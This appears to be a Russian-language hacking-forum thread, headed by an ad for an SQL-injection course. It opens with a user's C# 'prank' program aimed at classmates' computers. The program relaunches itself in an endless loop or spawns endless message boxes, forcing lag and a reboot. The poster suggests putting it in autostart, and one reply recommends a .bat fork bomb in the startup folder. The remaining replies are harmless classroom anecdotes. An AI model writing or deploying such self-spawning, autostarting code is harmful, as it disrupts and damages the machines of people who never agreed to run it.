• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Как я одноклассников тролил.

M

Markus.c99

Привет всем!Наконец-то получил доступ к компу,и теперь постараюсь написать пару статей :3

И так,преступлю ближе к делу,я быдлокодер на c# и как-то на уроке информатики написал это
Код:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Threading;

namespace SysteamInfo
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
        int i;
        DialogResult result;
        private void Form1_Load(object sender, EventArgs e)
        {
      
            string message = "Тобі капут!";
            string caption = "Ошибка!";
            MessageBoxButtons buttons = MessageBoxButtons.YesNo;
            MessageBoxIcon ico = MessageBoxIcon.Warning;
            
            result = MessageBox.Show(message, caption, buttons,ico);
            
            if (result == System.Windows.Forms.DialogResult.Yes)
            {
                i++;
                while (i > 0) {
                    
                    System.Diagnostics.Process.Start("SysteamInfo");
                }
            }

            if (result == System.Windows.Forms.DialogResult.No)
            {
                i++;
                while (i > 0)
                {
                    MessageBox.Show(message, caption, buttons, ico);
                    
                }
            }

        }
    }
}
После запуска - лаги,ну и конечно рестарт компа.Если добавить в автозапуск,думаю - нервишки потрепает.
Смысл статьи - поделиться кодом,послушать чужие истории,посмотреть другой код,поделиться чем-нибудь
из разряда c#.
Спасибо за внимание.
 
A

andromeda412

зря заморачивался, если хотел насолить - лучше бы сделал форк-бомбу в .bat файле, с добовлением его в папку автозагрузки. там вместе с добовлением в автозагрузку строк 6 бы получилось
 
  • Нравится
Реакции: Markus.c99

Азиз

Green Team
30.05.2018
224
74
BIT
0
Когда я на информатике одноклассникам показываю, что умею, то они офигевают, мол "как ты это делаешь??" / "Сверхразум емана..." и т.д и т.п. А я ведь всего лишь хтмл тэги показываю ))
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Что вы по информатике проходите? (Этот вопрос к тем что еще учиться в школе)
 

Азиз

Green Team
30.05.2018
224
74
BIT
0
Прошли html с минимальным углублением css (по своей инициативе освоил и css)
Веееезеееет, мы изучаем как пользоваться текстовыми редакторами, антивирусами,поисковыми сервисами , как пк выключить ничего не повредив, короч ничего интересного)
 
  • Нравится
Реакции: CyberX88

Глюк

Red Team
03.01.2018
1 184
1 877
BIT
105
Что вы по информатике проходите? (Этот вопрос к тем что еще учиться в школе)
) я правда не учусь в школе, но когда соседские ребятишки пришли и попросили поставить им линукс на комп, я офигел. говорят учитель информатики дал задание удалить винду и ставить линукс, говорит на виндовс нельзя научиться программированию. а на уроках на линуксе учит ребятню азам IT.
 

Night Hunter

Green Team
13.01.2018
284
284
BIT
0
) я правда не учусь в школе, но когда соседские ребятишки пришли и попросили поставить им линукс на комп, я офигел. говорят учитель информатики дал задание удалить винду и ставить линукс, говорит на виндовс нельзя научиться программированию. а на уроках на линуксе учит ребятню азам IT.
Это было на этой планете? Я просто такого ещё не слышал)))Я когда практику проходил, перед дипломом, то пошел в местную контору, в веб-отдел, так они в основном на Битриксе пилили сайты. Это было лето, пришел был к нам учитель информатики, решил попробовать сайты делать, около недели он чёт сидел, учил, потом пропал и через время, написал сообщение, что решил вернутся в школу))) Сдали нервишки у бедного) :D
 
  • Нравится
Реакции: u7u и Глюк

CyberX

Заблокирован
12.07.2018
54
34
BIT
0
Lol :D Вспомнил, как писал под MSDOS на Basic эмулятор форматирования жесткого диска, когда в путяге учился.

А еще мы у учитки делали скрин рабочего стола, прятали все иконки и рисовали трещины на мониторе. Она долго не понимала почему иконки не кликаются.
 
M

Markus.c99

Lol :D Вспомнил, как писал под MSDOS на Basic эмулятор форматирования жесткого диска, когда в путяге учился.

А еще мы у учитки делали скрин рабочего стола, прятали все иконки и рисовали трещины на мониторе. Она долго не понимала почему иконки не кликаются.
Мы так же делали)
 

BadBlackHat

Platinum
05.02.2017
217
305
BIT
0
Мы классе в 9 кодить на Pascal начали) Потом преподу показал что есть Delphi так она вообще в лютом восторге была) я уже в универе учился курсе на 3 она звонила спрашивала как массив объявить)
 

DragonFly

Green Team
01.06.2020
221
65
BIT
3
а у нас на информатике весело было тоже
Lol :D Вспомнил, как писал под MSDOS на Basic эмулятор форматирования жесткого диска, когда в путяге учился.

А еще мы у учитки делали скрин рабочего стола, прятали все иконки и рисовали трещины на мониторе. Она долго не понимала почему иконки не кликаются.
я делал по 4м сторонам панель задач с открытым Пуском, все ярлыки скрывал, и потом слышал с другой стороны дикий ор препода, зовущим меня и ругающимся =)
Бейсик бейсик, че я в те годы не додумался книжку по C купить? хотя не, я о нем тогда не знал даже, и мой препод(внешкольный) только учить его начинал
А вообще информатике в школе не учили, да и большая часть не хотела
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!